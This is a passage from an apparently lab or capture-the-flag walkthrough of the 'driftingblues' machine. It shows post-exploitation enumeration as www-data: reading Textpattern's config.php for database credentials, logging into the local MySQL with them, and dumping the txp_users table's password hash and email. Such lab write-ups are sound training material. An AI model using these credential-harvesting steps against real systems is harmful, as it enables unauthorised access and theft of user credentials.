Configurations
Checking for configuration files after performing a manual enumeration on the driftingblues(192.168.207.219) host.
www-data@driftingblues:/var/www/textpattern/textpattern$ cat config.php
<?php
$txpcfg['db'] = 'textpattern_db';
$txpcfg['user'] = 'drifter';
$txpcfg['pass'] = 'imjustdrifting31';
$txpcfg['host'] = 'localhost';
$txpcfg['table_prefix'] = '';
$txpcfg['txpath'] = '/var/www/textpattern/textpattern';
$txpcfg['dbcharset'] = 'utf8mb4';
// For more customization options, please consult config-dist.php file.DB credential identified; drifter:imjustdrifting31
MySQL
An internal MySQL instance has been identified and running on the 127.0.0.1:3306
www-data@driftingblues:/var/www/textpattern$ mysql -udrifter -pimjustdrifting31
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5288
Server version: 5.5.47-0+deb7u1 (Debian)
Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> Session established.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| textpattern_db |
+--------------------+
2 rows in set (0.02 sec)textpattern_db DB
textpattern_db DB
mysql> use textpattern_db;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+--------------------------+
| Tables_in_textpattern_db |
+--------------------------+
| textpattern |
| txp_category |
| txp_css |
| txp_discuss |
| txp_discuss_nonce |
| txp_file |
| txp_form |
| txp_image |
| txp_lang |
| txp_link |
| txp_log |
| txp_page |
| txp_plugin |
| txp_prefs |
| txp_section |
| txp_skin |
| txp_token |
| txp_users |
+--------------------------+
18 rows in set (0.00 sec)txp_users
textpattern_db.txp_users Table
mysql> SELECT * FROM txp_users;
+---------+-------+--------------------------------------------------------------+---------------+----------------------------+-------+---------------------+----------------------------------+
| user_id | name | pass | RealName | email | privs | last_access | nonce |
+---------+-------+--------------------------------------------------------------+---------------+----------------------------+-------+---------------------+----------------------------------+
| 1 | mayer | $2y$10$vLuVi6USHmoVNQHioadI5OGONW1qXjqKxi4fVYAceKsAo5gzUPmeq | hakan tasiyan | hakanyasiyan@universal.com | 1 | 2025-07-02 13:32:39 | c5d3e0dcf4972bd285aafed992cdeae6 |
+---------+-------+--------------------------------------------------------------+---------------+----------------------------+-------+---------------------+----------------------------------+
1 row in set (0.00 sec)Already known credential. N/A